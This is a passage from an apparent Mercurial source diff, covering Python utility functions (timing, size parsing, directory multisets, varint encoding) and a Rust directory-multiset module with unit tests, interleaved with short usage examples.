3035 # platform dependent, see util.timer)
3037 # platform dependent, see util.timer)
3036 start = attr.ib(default=attr.Factory(lambda: timer()))
3038 start = attr.ib(default=attr.Factory(lambda: timer()))
3037 # the number of seconds as a floating point value; starts at 0, updated when
3039 # the number of seconds as a floating point value; starts at 0, updated when
3038 # the context is exited.
3040 # the context is exited.
3039 elapsed = attr.ib(default=0)
3041 elapsed = attr.ib(default=0)
3040 # the number of nested timedcm context managers.
3042 # the number of nested timedcm context managers.
3041 level = attr.ib(default=1)
3043 level = attr.ib(default=1)
3042
3044
3043 def __bytes__(self):
3045 def __bytes__(self):
3044 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3046 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3045
3047
3046 __str__ = encoding.strmethod(__bytes__)
3048 __str__ = encoding.strmethod(__bytes__)
3047
3049
3048 @contextlib.contextmanager
3050 @contextlib.contextmanager
3049 def timedcm(whencefmt, *whenceargs):
3051 def timedcm(whencefmt, *whenceargs):
3050 """A context manager that produces timing information for a given context.
3052 """A context manager that produces timing information for a given context.
3051
3053
3052 On entering, a timedcmstats instance is produced.
3054 On entering, a timedcmstats instance is produced.
3053
3055
3054 This context manager is reentrant.
3056 This context manager is reentrant.
3055
3057
3056 """
3058 """
3057 # track nested context managers
3059 # track nested context managers
3058 timedcm._nested += 1
3060 timedcm._nested += 1
3059 timing_stats = timedcmstats(level=timedcm._nested)
3061 timing_stats = timedcmstats(level=timedcm._nested)
3060 try:
3062 try:
3061 with tracing.log(whencefmt, *whenceargs):
3063 with tracing.log(whencefmt, *whenceargs):
3062 yield timing_stats
3064 yield timing_stats
3063 finally:
3065 finally:
3064 timing_stats.elapsed = timer() - timing_stats.start
3066 timing_stats.elapsed = timer() - timing_stats.start
3065 timedcm._nested -= 1
3067 timedcm._nested -= 1
3066
3068
3067 timedcm._nested = 0
3069 timedcm._nested = 0
3068
3070
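Typical usage, with a hypothetical workload:

    with timedcm(b'rebuilding %s', b'index') as stats:
        rebuild_index()   # stand-in for the timed work
    # on exit, stats.elapsed holds the duration; bytes(stats) formats it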
3069 def timed(func):
3071 def timed(func):
3070 '''Report the execution time of a function call to stderr.
3072 '''Report the execution time of a function call to stderr.
3071
3073
3072 During development, use as a decorator when you need to measure
3074 During development, use as a decorator when you need to measure
3073 the cost of a function, e.g. as follows:
3075 the cost of a function, e.g. as follows:
3074
3076
3075 @util.timed
3077 @util.timed
3076 def foo(a, b, c):
3078 def foo(a, b, c):
3077 pass
3079 pass
3078 '''
3080 '''
3079
3081
3080 def wrapper(*args, **kwargs):
3082 def wrapper(*args, **kwargs):
3081 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3083 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3082 result = func(*args, **kwargs)
3084 result = func(*args, **kwargs)
3083 stderr = procutil.stderr
3085 stderr = procutil.stderr
3084 stderr.write('%s%s: %s\n' % (
3086 stderr.write('%s%s: %s\n' % (
3085 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3087 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3086 time_stats))
3088 time_stats))
3087 return result
3089 return result
3088 return wrapper
3090 return wrapper
3089
3091
3090 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3092 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3091 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3093 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3092
3094
3093 def sizetoint(s):
3095 def sizetoint(s):
3094 '''Convert a space specifier to a byte count.
3096 '''Convert a space specifier to a byte count.
3095
3097
3096 >>> sizetoint(b'30')
3098 >>> sizetoint(b'30')
3097 30
3099 30
3098 >>> sizetoint(b'2.2kb')
3100 >>> sizetoint(b'2.2kb')
3099 2252
3101 2252
3100 >>> sizetoint(b'6M')
3102 >>> sizetoint(b'6M')
3101 6291456
3103 6291456
3102 '''
3104 '''
3103 t = s.strip().lower()
3105 t = s.strip().lower()
3104 try:
3106 try:
3105 for k, u in _sizeunits:
3107 for k, u in _sizeunits:
3106 if t.endswith(k):
3108 if t.endswith(k):
3107 return int(float(t[:-len(k)]) * u)
3109 return int(float(t[:-len(k)]) * u)
3108 return int(t)
3110 return int(t)
3109 except ValueError:
3111 except ValueError:
3110 raise error.ParseError(_("couldn't parse size: %s") % s)
3112 raise error.ParseError(_("couldn't parse size: %s") % s)
3111
3113
3112 class hooks(object):
3114 class hooks(object):
3113 '''A collection of hook functions that can be used to extend a
3115 '''A collection of hook functions that can be used to extend a
3114 function's behavior. Hooks are called in lexicographic order,
3116 function's behavior. Hooks are called in lexicographic order,
3115 based on the names of their sources.'''
3117 based on the names of their sources.'''
3116
3118
3117 def __init__(self):
3119 def __init__(self):
3118 self._hooks = []
3120 self._hooks = []
3119
3121
3120 def add(self, source, hook):
3122 def add(self, source, hook):
3121 self._hooks.append((source, hook))
3123 self._hooks.append((source, hook))
3122
3124
3123 def __call__(self, *args):
3125 def __call__(self, *args):
3124 self._hooks.sort(key=lambda x: x[0])
3126 self._hooks.sort(key=lambda x: x[0])
3125 results = []
3127 results = []
3126 for source, hook in self._hooks:
3128 for source, hook in self._hooks:
3127 results.append(hook(*args))
3129 results.append(hook(*args))
3128 return results
3130 return results
3129
3131
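For example, note that call order follows the source names, not registration order:

    h = hooks()
    h.add(b'zzz', lambda x: x * 2)
    h.add(b'aaa', lambda x: x + 1)
    h(10)   # -> [11, 20]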
3130 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3132 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3131 '''Yields lines for a nicely formatted stacktrace.
3133 '''Yields lines for a nicely formatted stacktrace.
3132 Skips the 'skip' last entries, then returns the last 'depth' entries.
3134 Skips the 'skip' last entries, then returns the last 'depth' entries.
3133 Each file+linenumber is formatted according to fileline.
3135 Each file+linenumber is formatted according to fileline.
3134 Each line is formatted according to line.
3136 Each line is formatted according to line.
3135 If line is None, it yields:
3137 If line is None, it yields:
3136 length of longest filepath+line number,
3138 length of longest filepath+line number,
3137 filepath+linenumber,
3139 filepath+linenumber,
3138 function
3140 function
3139
3141
3140 Not to be used in production code, but very convenient while developing.
3142 Not to be used in production code, but very convenient while developing.
3141 '''
3143 '''
3142 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3144 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3143 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3145 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3144 ][-depth:]
3146 ][-depth:]
3145 if entries:
3147 if entries:
3146 fnmax = max(len(entry[0]) for entry in entries)
3148 fnmax = max(len(entry[0]) for entry in entries)
3147 for fnln, func in entries:
3149 for fnln, func in entries:
3148 if line is None:
3150 if line is None:
3149 yield (fnmax, fnln, func)
3151 yield (fnmax, fnln, func)
3150 else:
3152 else:
3151 yield line % (fnmax, fnln, func)
3153 yield line % (fnmax, fnln, func)
3152
3154
3153 def debugstacktrace(msg='stacktrace', skip=0,
3155 def debugstacktrace(msg='stacktrace', skip=0,
3154 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3156 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3155 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3157 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3156 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3158 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3157 By default it will flush stdout first.
3159 By default it will flush stdout first.
3158 It can be used everywhere and intentionally does not require a ui object.
3160 It can be used everywhere and intentionally does not require a ui object.
3159 Not to be used in production code, but very convenient while developing.
3161 Not to be used in production code, but very convenient while developing.
3160 '''
3162 '''
3161 if otherf:
3163 if otherf:
3162 otherf.flush()
3164 otherf.flush()
3163 f.write('%s at:\n' % msg.rstrip())
3165 f.write('%s at:\n' % msg.rstrip())
3164 for line in getstackframes(skip + 1, depth=depth):
3166 for line in getstackframes(skip + 1, depth=depth):
3165 f.write(line)
3167 f.write(line)
3166 f.flush()
3168 f.flush()
3167
3169
3168 class dirs(object):
3170 class dirs(object):
3169 '''a multiset of directory names from a dirstate or manifest'''
3171 '''a multiset of directory names from a dirstate or manifest'''
3170
3172
3171 def __init__(self, map, skip=None):
3173 def __init__(self, map, skip=None):
3172 self._dirs = {}
3174 self._dirs = {}
3173 addpath = self.addpath
3175 addpath = self.addpath
3174 if safehasattr(map, 'iteritems') and skip is not None:
3176 if safehasattr(map, 'iteritems') and skip is not None:
3175 for f, s in map.iteritems():
3177 for f, s in map.iteritems():
3176 if s[0] != skip:
3178 if s[0] != skip:
3177 addpath(f)
3179 addpath(f)
3178 else:
3180 else:
3179 for f in map:
3181 for f in map:
3180 addpath(f)
3182 addpath(f)
3181
3183
3182 def addpath(self, path):
3184 def addpath(self, path):
3183 dirs = self._dirs
3185 dirs = self._dirs
3184 for base in finddirs(path):
3186 for base in finddirs(path):
3185 if base in dirs:
3187 if base in dirs:
3186 dirs[base] += 1
3188 dirs[base] += 1
3187 return
3189 return
3188 dirs[base] = 1
3190 dirs[base] = 1
3189
3191
3190 def delpath(self, path):
3192 def delpath(self, path):
3191 dirs = self._dirs
3193 dirs = self._dirs
3192 for base in finddirs(path):
3194 for base in finddirs(path):
3193 if dirs[base] > 1:
3195 if dirs[base] > 1:
3194 dirs[base] -= 1
3196 dirs[base] -= 1
3195 return
3197 return
3196 del dirs[base]
3198 del dirs[base]
3197
3199
3198 def __iter__(self):
3200 def __iter__(self):
3199 return iter(self._dirs)
3201 return iter(self._dirs)
3200
3202
3201 def __contains__(self, d):
3203 def __contains__(self, d):
3202 return d in self._dirs
3204 return d in self._dirs
3203
3205
3204 if safehasattr(parsers, 'dirs'):
3206 if safehasattr(parsers, 'dirs'):
3205 dirs = parsers.dirs
3207 dirs = parsers.dirs
3206
3208
3209 if rustdirs is not None:
3210 dirs = rustdirs
3211
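Whichever implementation ends up bound to dirs (the pure Python class above, the C parsers version, or the new Rust-backed rustdirs), the intended multiset semantics are the same; a sketch, assuming the replacements stay drop-in compatible:

    d = dirs([b'a/b/x', b'a/b/y', b'a/c'])
    assert b'a' in d and b'a/b' in d
    d.delpath(b'a/b/x')
    assert b'a/b' in d       # b'a/b/y' still references it
    d.delpath(b'a/b/y')
    assert b'a/b' not in d   # last reference gone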
3207 def finddirs(path):
3212 def finddirs(path):
3208 pos = path.rfind('/')
3213 pos = path.rfind('/')
3209 while pos != -1:
3214 while pos != -1:
3210 yield path[:pos]
3215 yield path[:pos]
3211 pos = path.rfind('/', 0, pos)
3216 pos = path.rfind('/', 0, pos)
3212 yield ''
3217 yield ''
3213
3218
3214
3219
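finddirs yields every ancestor directory, ending with the empty root:

    list(finddirs(b'a/b/c'))   # -> [b'a/b', b'a', b'']
    list(finddirs(b'top'))     # -> [b'']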
3215 # convenient shortcut
3220 # convenient shortcut
3216 dst = debugstacktrace
3221 dst = debugstacktrace
3217
3222
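During development one can drop this anywhere, e.g.:

    dst(b'entering merge', depth=5)   # prints the last 5 frames to stderr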
3218 def safename(f, tag, ctx, others=None):
3223 def safename(f, tag, ctx, others=None):
3219 """
3224 """
3220 Generate a name that it is safe to rename f to in the given context.
3225 Generate a name that it is safe to rename f to in the given context.
3221
3226
3222 f: filename to rename
3227 f: filename to rename
3223 tag: a string tag that will be included in the new name
3228 tag: a string tag that will be included in the new name
3224 ctx: a context, in which the new name must not exist
3229 ctx: a context, in which the new name must not exist
3225 others: a set of other filenames that the new name must not be in
3230 others: a set of other filenames that the new name must not be in
3226
3231
3227 Returns a file name of the form oldname~tag[~number] which does not exist
3232 Returns a file name of the form oldname~tag[~number] which does not exist
3228 in the provided context and is not in the set of other names.
3233 in the provided context and is not in the set of other names.
3229 """
3234 """
3230 if others is None:
3235 if others is None:
3231 others = set()
3236 others = set()
3232
3237
3233 fn = '%s~%s' % (f, tag)
3238 fn = '%s~%s' % (f, tag)
3234 if fn not in ctx and fn not in others:
3239 if fn not in ctx and fn not in others:
3235 return fn
3240 return fn
3236 for n in itertools.count(1):
3241 for n in itertools.count(1):
3237 fn = '%s~%s~%s' % (f, tag, n)
3242 fn = '%s~%s~%s' % (f, tag, n)
3238 if fn not in ctx and fn not in others:
3243 if fn not in ctx and fn not in others:
3239 return fn
3244 return fn
3240
3245
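For example, with a hypothetical context ctx:

    safename(b'foo.c', b'resolved', ctx)
    # -> b'foo.c~resolved', or b'foo.c~resolved~1', ~2, ... if taken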
3241 def readexactly(stream, n):
3246 def readexactly(stream, n):
3242 '''read n bytes from stream.read and abort if less was available'''
3247 '''read n bytes from stream.read and abort if less was available'''
3243 s = stream.read(n)
3248 s = stream.read(n)
3244 if len(s) < n:
3249 if len(s) < n:
3245 raise error.Abort(_("stream ended unexpectedly"
3250 raise error.Abort(_("stream ended unexpectedly"
3246 " (got %d bytes, expected %d)")
3251 " (got %d bytes, expected %d)")
3247 % (len(s), n))
3252 % (len(s), n))
3248 return s
3253 return s
3249
3254
3250 def uvarintencode(value):
3255 def uvarintencode(value):
3251 """Encode an unsigned integer value to a varint.
3256 """Encode an unsigned integer value to a varint.
3252
3257
3253 A varint is a variable length integer of 1 or more bytes. Each byte
3258 A varint is a variable length integer of 1 or more bytes. Each byte
3254 except the last has the most significant bit set. The lower 7 bits of
3259 except the last has the most significant bit set. The lower 7 bits of
3255 each byte store the 2's complement representation, least significant group
3260 each byte store the 2's complement representation, least significant group
3256 first.
3261 first.
3257
3262
3258 >>> uvarintencode(0)
3263 >>> uvarintencode(0)
3259 '\\x00'
3264 '\\x00'
3260 >>> uvarintencode(1)
3265 >>> uvarintencode(1)
3261 '\\x01'
3266 '\\x01'
3262 >>> uvarintencode(127)
3267 >>> uvarintencode(127)
3263 '\\x7f'
3268 '\\x7f'
3264 >>> uvarintencode(1337)
3269 >>> uvarintencode(1337)
3265 '\\xb9\\n'
3270 '\\xb9\\n'
3266 >>> uvarintencode(65536)
3271 >>> uvarintencode(65536)
3267 '\\x80\\x80\\x04'
3272 '\\x80\\x80\\x04'
3268 >>> uvarintencode(-1)
3273 >>> uvarintencode(-1)
3269 Traceback (most recent call last):
3274 Traceback (most recent call last):
3270 ...
3275 ...
3271 ProgrammingError: negative value for uvarint: -1
3276 ProgrammingError: negative value for uvarint: -1
3272 """
3277 """
3273 if value < 0:
3278 if value < 0:
3274 raise error.ProgrammingError('negative value for uvarint: %d'
3279 raise error.ProgrammingError('negative value for uvarint: %d'
3275 % value)
3280 % value)
3276 bits = value & 0x7f
3281 bits = value & 0x7f
3277 value >>= 7
3282 value >>= 7
3278 bytes = []
3283 bytes = []
3279 while value:
3284 while value:
3280 bytes.append(pycompat.bytechr(0x80 | bits))
3285 bytes.append(pycompat.bytechr(0x80 | bits))
3281 bits = value & 0x7f
3286 bits = value & 0x7f
3282 value >>= 7
3287 value >>= 7
3283 bytes.append(pycompat.bytechr(bits))
3288 bytes.append(pycompat.bytechr(bits))
3284
3289
3285 return ''.join(bytes)
3290 return ''.join(bytes)
3286
3291
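Working through the 1337 case from the doctest by hand:

    # 1337 == 0b101_0011_1001
    #   low 7 bits  -> 0111001 == 0x39; continuation bit set -> 0xb9
    #   remaining   -> 0001010 == 0x0a; last byte, bit clear -> 0x0a
    assert uvarintencode(1337) == b'\xb9\n'   # 0x0a displays as '\n'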
3287 def uvarintdecodestream(fh):
3292 def uvarintdecodestream(fh):
3288 """Decode an unsigned variable length integer from a stream.
3293 """Decode an unsigned variable length integer from a stream.
3289
3294
3290 The passed argument is anything that has a ``.read(N)`` method.
3295 The passed argument is anything that has a ``.read(N)`` method.
3291
3296
3292 >>> try:
3297 >>> try:
3293 ... from StringIO import StringIO as BytesIO
3298 ... from StringIO import StringIO as BytesIO
3294 ... except ImportError:
3299 ... except ImportError:
3295 ... from io import BytesIO
3300 ... from io import BytesIO
3296 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3301 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3297 0
3302 0
3298 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3303 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3299 1
3304 1
3300 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3305 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3301 127
3306 127
3302 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3307 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3303 1337
3308 1337
3304 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3309 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3305 65536
3310 65536
3306 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3311 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3307 Traceback (most recent call last):
3312 Traceback (most recent call last):
3308 ...
3313 ...
3309 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3314 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3310 """
3315 """
3311 result = 0
3316 result = 0
3312 shift = 0
3317 shift = 0
3313 while True:
3318 while True:
3314 byte = ord(readexactly(fh, 1))
3319 byte = ord(readexactly(fh, 1))
3315 result |= ((byte & 0x7f) << shift)
3320 result |= ((byte & 0x7f) << shift)
3316 if not (byte & 0x80):
3321 if not (byte & 0x80):
3317 return result
3322 return result
3318 shift += 7
3323 shift += 7
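A round trip tying the two helpers together:

    from io import BytesIO
    for value in (0, 1, 127, 1337, 65536):
        assert uvarintdecodestream(BytesIO(uvarintencode(value))) == value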
@@ -1,355 +1,357 b''
1 // dirs_multiset.rs
1 // dirs_multiset.rs
2 //
2 //
3 // Copyright 2019 Raphaël Gomès <rgomes@octobus.net>
3 // Copyright 2019 Raphaël Gomès <rgomes@octobus.net>
4 //
4 //
5 // This software may be used and distributed according to the terms of the
5 // This software may be used and distributed according to the terms of the
6 // GNU General Public License version 2 or any later version.
6 // GNU General Public License version 2 or any later version.
7
7
8 //! A multiset of directory names.
8 //! A multiset of directory names.
9 //!
9 //!
10 //! Used to count the references to directories in a manifest or dirstate.
10 //! Used to count the references to directories in a manifest or dirstate.
11 use std::collections::hash_map::Entry;
11 use std::collections::hash_map::Entry;
12 use std::collections::HashMap;
12 use std::collections::HashMap;
13 use std::ops::Deref;
13 use std::ops::Deref;
14 use {DirsIterable, DirstateEntry, DirstateMapError};
14 use {DirsIterable, DirstateEntry, DirstateMapError};
15
15
16 #[derive(PartialEq, Debug)]
16 #[derive(PartialEq, Debug)]
17 pub struct DirsMultiset {
17 pub struct DirsMultiset {
18 inner: HashMap<Vec<u8>, u32>,
18 inner: HashMap<Vec<u8>, u32>,
19 }
19 }
20
20
21 impl Deref for DirsMultiset {
21 impl Deref for DirsMultiset {
22 type Target = HashMap<Vec<u8>, u32>;
22 type Target = HashMap<Vec<u8>, u32>;
23
23
24 fn deref(&self) -> &Self::Target {
24 fn deref(&self) -> &Self::Target {
25 &self.inner
25 &self.inner
26 }
26 }
27 }
27 }
28
28
29 impl DirsMultiset {
29 impl DirsMultiset {
30 /// Initializes the multiset from a dirstate or a manifest.
30 /// Initializes the multiset from a dirstate or a manifest.
31 ///
31 ///
32 /// If `skip_state` is provided, skips dirstate entries with equal state.
32 /// If `skip_state` is provided, skips dirstate entries with equal state.
33 pub fn new(iterable: DirsIterable, skip_state: Option<i8>) -> Self {
33 pub fn new(iterable: DirsIterable, skip_state: Option<i8>) -> Self {
34 let mut multiset = DirsMultiset {
34 let mut multiset = DirsMultiset {
35 inner: HashMap::new(),
35 inner: HashMap::new(),
36 };
36 };
37
37
38 match iterable {
38 match iterable {
39 DirsIterable::Dirstate(vec) => {
39 DirsIterable::Dirstate(vec) => {
40 for (ref filename, DirstateEntry { state, .. }) in vec {
40 for (ref filename, DirstateEntry { state, .. }) in vec {
41 // This `if` is optimized out of the loop
41 // This `if` is optimized out of the loop
42 if let Some(skip) = skip_state {
42 if let Some(skip) = skip_state {
43 if skip != state {
43 if skip != state {
44 multiset.add_path(filename);
44 multiset.add_path(filename);
45 }
45 }
46 } else {
46 } else {
47 multiset.add_path(filename);
47 multiset.add_path(filename);
48 }
48 }
49 }
49 }
50 }
50 }
51 DirsIterable::Manifest(vec) => {
51 DirsIterable::Manifest(vec) => {
52 for ref filename in vec {
52 for ref filename in vec {
53 multiset.add_path(filename);
53 multiset.add_path(filename);
54 }
54 }
55 }
55 }
56 }
56 }
57
57
58 multiset
58 multiset
59 }
59 }
60
60
61 /// Returns the slice up to the next directory name from right to left,
61 /// Returns the slice up to the next directory name from right to left,
62 /// without trailing slash
62 /// without trailing slash
63 fn find_dir(path: &[u8]) -> &[u8] {
63 fn find_dir(path: &[u8]) -> &[u8] {
64 let mut path = path;
64 let mut path = path;
65 loop {
65 loop {
66 if let Some(new_pos) = path.len().checked_sub(1) {
66 if let Some(new_pos) = path.len().checked_sub(1) {
67 if path[new_pos] == b'/' {
67 if path[new_pos] == b'/' {
68 break &path[..new_pos];
68 break &path[..new_pos];
69 }
69 }
70 path = &path[..new_pos];
70 path = &path[..new_pos];
71 } else {
71 } else {
72 break &[];
72 break &[];
73 }
73 }
74 }
74 }
75 }
75 }
76
76
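For readers following along on the Python side, a minimal Python rendition of this helper (the function name is reused for illustration only):

    def find_dir(path):
        # drop the last '/'-separated component; b'' when no slash remains
        pos = path.rfind(b'/')
        return path[:pos] if pos != -1 else b''

    find_dir(b'a/b/c')   # -> b'a/b'
    find_dir(b'a/b/')    # -> b'a/b' (trailing slash: the dir itself)
    find_dir(b'a')       # -> b''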
77 /// Increases the count of the deepest directory contained in the path.
77 /// Increases the count of the deepest directory contained in the path.
78 ///
78 ///
79 /// If the directory is not yet in the map, adds its parents.
79 /// If the directory is not yet in the map, adds its parents.
80 pub fn add_path(&mut self, path: &[u8]) {
80 pub fn add_path(&mut self, path: &[u8]) {
81 let mut pos = path.len();
81 let mut pos = path.len();
82
82
83 loop {
83 loop {
84 let subpath = Self::find_dir(&path[..pos]);
84 let subpath = Self::find_dir(&path[..pos]);
85 if let Some(val) = self.inner.get_mut(subpath) {
85 if let Some(val) = self.inner.get_mut(subpath) {
86 *val += 1;
86 *val += 1;
87 break;
87 break;
88 }
88 }
89 self.inner.insert(subpath.to_owned(), 1);
89 self.inner.insert(subpath.to_owned(), 1);
90
90
91 pos = subpath.len();
91 pos = subpath.len();
92 if pos == 0 {
92 if pos == 0 {
93 break;
93 break;
94 }
94 }
95 }
95 }
96 }
96 }
97
97
98 /// Decreases the count of the deepest directory contained in the path.
98 /// Decreases the count of the deepest directory contained in the path.
99 ///
99 ///
100 /// If it is the only reference, decreases all parents until one is
100 /// If it is the only reference, decreases all parents until one is
101 /// removed.
101 /// removed.
102 /// If the directory is not in the map, something horrible has happened.
102 /// If the directory is not in the map, something horrible has happened.
103 pub fn delete_path(
103 pub fn delete_path(
104 &mut self,
104 &mut self,
105 path: &[u8],
105 path: &[u8],
106 ) -> Result<(), DirstateMapError> {
106 ) -> Result<(), DirstateMapError> {
107 let mut pos = path.len();
107 let mut pos = path.len();
108
108
109 loop {
109 loop {
110 let subpath = Self::find_dir(&path[..pos]);
110 let subpath = Self::find_dir(&path[..pos]);
111 match self.inner.entry(subpath.to_owned()) {
111 match self.inner.entry(subpath.to_owned()) {
112 Entry::Occupied(mut entry) => {
112 Entry::Occupied(mut entry) => {
113 let val = entry.get().clone();
113 let val = entry.get().clone();
114 if val > 1 {
114 if val > 1 {
115 entry.insert(val - 1);
115 entry.insert(val - 1);
116 break;
116 break;
117 }
117 }
118 entry.remove();
118 entry.remove();
119 }
119 }
120 Entry::Vacant(_) => {
120 Entry::Vacant(_) => {
121 return Err(DirstateMapError::PathNotFound(path.to_owned()))
121 return Err(DirstateMapError::PathNotFound(
122 path.to_owned(),
123 ))
122 }
124 }
123 };
125 };
124
126
125 pos = subpath.len();
127 pos = subpath.len();
126 if pos == 0 {
128 if pos == 0 {
127 break;
129 break;
128 }
130 }
129 }
131 }
130
132
131 Ok(())
133 Ok(())
132 }
134 }
133 }
135 }
134
136
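On the Python side this type surfaces as the rustdirs class used in the dirs = rustdirs reassignment above; a hedged sketch, assuming the binding stays constructor-compatible with the pure Python dirs:

    if rustdirs is not None:
        d = rustdirs([b'a/b', b'a/c'])   # backed by DirsMultiset
        assert b'a' in d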
135 #[cfg(test)]
137 #[cfg(test)]
136 mod tests {
138 mod tests {
137 use super::*;
139 use super::*;
138
140
139 #[test]
141 #[test]
140 fn test_delete_path_path_not_found() {
142 fn test_delete_path_path_not_found() {
141 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
143 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
142 let path = b"doesnotexist/";
144 let path = b"doesnotexist/";
143 assert_eq!(
145 assert_eq!(
144 Err(DirstateMapError::PathNotFound(path.to_vec())),
146 Err(DirstateMapError::PathNotFound(path.to_vec())),
145 map.delete_path(path)
147 map.delete_path(path)
146 );
148 );
147 }
149 }
148
150
149 #[test]
151 #[test]
150 fn test_delete_path_empty_path() {
152 fn test_delete_path_empty_path() {
151 let mut map =
153 let mut map =
152 DirsMultiset::new(DirsIterable::Manifest(vec![vec![]]), None);
154 DirsMultiset::new(DirsIterable::Manifest(vec![vec![]]), None);
153 let path = b"";
155 let path = b"";
154 assert_eq!(Ok(()), map.delete_path(path));
156 assert_eq!(Ok(()), map.delete_path(path));
155 assert_eq!(
157 assert_eq!(
156 Err(DirstateMapError::PathNotFound(path.to_vec())),
158 Err(DirstateMapError::PathNotFound(path.to_vec())),
157 map.delete_path(path)
159 map.delete_path(path)
158 );
160 );
159 }
161 }
160
162
161 #[test]
163 #[test]
162 fn test_delete_path_successful() {
164 fn test_delete_path_successful() {
163 let mut map = DirsMultiset {
165 let mut map = DirsMultiset {
164 inner: [("", 5), ("a", 3), ("a/b", 2), ("a/c", 1)]
166 inner: [("", 5), ("a", 3), ("a/b", 2), ("a/c", 1)]
165 .iter()
167 .iter()
166 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
168 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
167 .collect(),
169 .collect(),
168 };
170 };
169
171
170 assert_eq!(Ok(()), map.delete_path(b"a/b/"));
172 assert_eq!(Ok(()), map.delete_path(b"a/b/"));
171 assert_eq!(Ok(()), map.delete_path(b"a/b/"));
173 assert_eq!(Ok(()), map.delete_path(b"a/b/"));
172 assert_eq!(
174 assert_eq!(
173 Err(DirstateMapError::PathNotFound(b"a/b/".to_vec())),
175 Err(DirstateMapError::PathNotFound(b"a/b/".to_vec())),
174 map.delete_path(b"a/b/")
176 map.delete_path(b"a/b/")
175 );
177 );
176
178
177 assert_eq!(2, *map.get(&b"a".to_vec()).unwrap());
179 assert_eq!(2, *map.get(&b"a".to_vec()).unwrap());
178 assert_eq!(1, *map.get(&b"a/c".to_vec()).unwrap());
180 assert_eq!(1, *map.get(&b"a/c".to_vec()).unwrap());
179 eprintln!("{:?}", map);
181 eprintln!("{:?}", map);
180 assert_eq!(Ok(()), map.delete_path(b"a/"));
182 assert_eq!(Ok(()), map.delete_path(b"a/"));
181 eprintln!("{:?}", map);
183 eprintln!("{:?}", map);
182
184
183 assert_eq!(Ok(()), map.delete_path(b"a/c/"));
185 assert_eq!(Ok(()), map.delete_path(b"a/c/"));
184 assert_eq!(
186 assert_eq!(
185 Err(DirstateMapError::PathNotFound(b"a/c/".to_vec())),
187 Err(DirstateMapError::PathNotFound(b"a/c/".to_vec())),
186 map.delete_path(b"a/c/")
188 map.delete_path(b"a/c/")
187 );
189 );
188 }
190 }
189
191
190 #[test]
192 #[test]
191 fn test_add_path_empty_path() {
193 fn test_add_path_empty_path() {
192 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
194 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
193 let path = b"";
195 let path = b"";
194 map.add_path(path);
196 map.add_path(path);
195
197
196 assert_eq!(1, map.len());
198 assert_eq!(1, map.len());
197 }
199 }
198
200
199 #[test]
201 #[test]
200 fn test_add_path_successful() {
202 fn test_add_path_successful() {
201 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
203 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
202
204
203 map.add_path(b"a/");
205 map.add_path(b"a/");
204 assert_eq!(1, *map.get(&b"a".to_vec()).unwrap());
206 assert_eq!(1, *map.get(&b"a".to_vec()).unwrap());
205 assert_eq!(1, *map.get(&Vec::new()).unwrap());
207 assert_eq!(1, *map.get(&Vec::new()).unwrap());
206 assert_eq!(2, map.len());
208 assert_eq!(2, map.len());
207
209
208 // Non directory should be ignored
210 // Non directory should be ignored
209 map.add_path(b"a");
211 map.add_path(b"a");
210 assert_eq!(1, *map.get(&b"a".to_vec()).unwrap());
212 assert_eq!(1, *map.get(&b"a".to_vec()).unwrap());
211 assert_eq!(2, map.len());
213 assert_eq!(2, map.len());
212
214
213 // Non directory will still add its base
215 // Non directory will still add its base
214 map.add_path(b"a/b");
216 map.add_path(b"a/b");
215 assert_eq!(2, *map.get(&b"a".to_vec()).unwrap());
217 assert_eq!(2, *map.get(&b"a".to_vec()).unwrap());
216 assert_eq!(2, map.len());
218 assert_eq!(2, map.len());
217
219
218 // Duplicate path works
220 // Duplicate path works
219 map.add_path(b"a/");
221 map.add_path(b"a/");
220 assert_eq!(3, *map.get(&b"a".to_vec()).unwrap());
222 assert_eq!(3, *map.get(&b"a".to_vec()).unwrap());
221
223
222 // Nested dir adds to its base
224 // Nested dir adds to its base
223 map.add_path(b"a/b/");
225 map.add_path(b"a/b/");
224 assert_eq!(4, *map.get(&b"a".to_vec()).unwrap());
